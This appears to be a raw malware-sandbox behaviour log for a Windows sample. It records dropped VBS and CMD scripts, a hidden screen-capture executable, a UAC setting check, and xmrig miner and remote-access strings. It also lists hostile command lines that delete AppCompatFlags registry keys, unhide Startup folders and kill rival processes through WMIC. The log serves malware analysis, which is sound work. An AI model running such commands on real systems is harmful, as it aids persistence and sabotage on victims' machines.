Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%Systemfont.exe%'
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%IntelSvc.exe%'
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%Systemfont.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="RtkAudio.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%RtkAudio.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%IntelSvc.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%Systemfont.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%palemoon.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%screen.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : \\user-PC\ROOT\CIMV2:Win32_Process.Handle="4772"::Terminate
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%choice.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%fontdrvhots.exe%'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%tv_x86.exe%'

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: K4gsPJGEi4.exe	String found in binary or memory: "-install_service" has no effect if running not under administrator rights
Source: K4gsPJGEi4.exe	String found in binary or memory: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: K4gsPJGEi4.exe	String found in binary or memory: L`ZDlefteditsettings_proxy_passwordfullrightsettings_btn_cancelsettings_btn_okinfoback_settingssettings_contacts_set_default_pathsettings_contacts_pathsettings_fmpathsettings_tab4settings_use_pinsessnotification_minimizedsettings_adminsettings_cb_minsettings_autosetvideomodesettings_cb_cursorsettings_cb_backsettings_tab2settings_cb_autosettings_fpssettings_showremotecursorsettings_autojoinfullscreensettings_txt_rec_infosettings_ffmpeg_pathsettings_tab5settings_qualitysettings_cb_show_btnrec_mwsettings_cb_auto_start_recordingsettings_recording_default_path_videosettings_recording_path_videosettings_cb_proxysettings_tab1settings_recording_qualitysettings_recording_frameratesettings_auth_serversettings_proxy_usersettings_proxy_portsettings_proxy_ipsettings_out_portsettings_direct_ip_connsettings_auth_portsettings_auth_ipsettings_listen_porthttps://www.Microsoft.com/ref/screen-recorder-installation\USOShared\Recordings\\USOShared\
Source: K4gsPJGEi4.exe	String found in binary or memory: /stop
Source: K4gsPJGEi4.exe	String found in binary or memory: /stop
Source: K4gsPJGEi4.exe	String found in binary or memory: /stop_code
Source: K4gsPJGEi4.exe	String found in binary or memory: /stop_code
Source: K4gsPJGEi4.exe	String found in binary or memory: --help
Source: K4gsPJGEi4.exe	String found in binary or memory: --help
Source: K4gsPJGEi4.exe	String found in binary or memory: -h, --help display this help and exit
Source: K4gsPJGEi4.exe	String found in binary or memory: -h, --help display this help and exit
Source: K4gsPJGEi4.exe	String found in binary or memory: a:c:kBp:Px:r:R:s:t:T:o:u:O:v:l:Sx:RtkAudio-h--help-V--version--versions--export-topology--print-platformsUsage: xmrig [OPTIONS]
Source: K4gsPJGEi4.exe	String found in binary or memory: a:c:kBp:Px:r:R:s:t:T:o:u:O:v:l:Sx:RtkAudio-h--help-V--version--versions--export-topology--print-platformsUsage: xmrig [OPTIONS]
Source: K4gsPJGEi4.exe	String found in binary or memory: if(p-start_p>size_limit)
Source: K4gsPJGEi4.exe	String found in binary or memory: id-cmc-addExtensions
Source: K4gsPJGEi4.exe	String found in binary or memory: set-addPolicy
Source: K4gsPJGEi4.exe	String found in binary or memory: crypto/store/loader_file.c
Source: K4gsPJGEi4.exe	String found in binary or memory: crypto/store/loader_file.cpass phrasePRIVATE KEYPUBLIC KEYPARAMETERSX509 CRLTRUSTED CERTIFICATEX509 CERTIFICATECERTIFICATEENCRYPTED PRIVATE KEYPKCS8 decrypt passwordPKCS12 import passwordfile:localhost/rb-----BEGIN %08lx/PEM'PEM type is 'file`q_@

Source: unknown	Process created: C:\Users\user\Desktop\K4gsPJGEi4.exe "C:\Users\user\Desktop\K4gsPJGEi4.exe"
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe C:\Windows\System32\find.exe "0x0"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"Local"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\."
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\."
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\."
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\."
Source: C:\Windows\SysWOW64\findstr.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe C:\Windows\System32\find.exe "0x0"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"Local"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\."	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
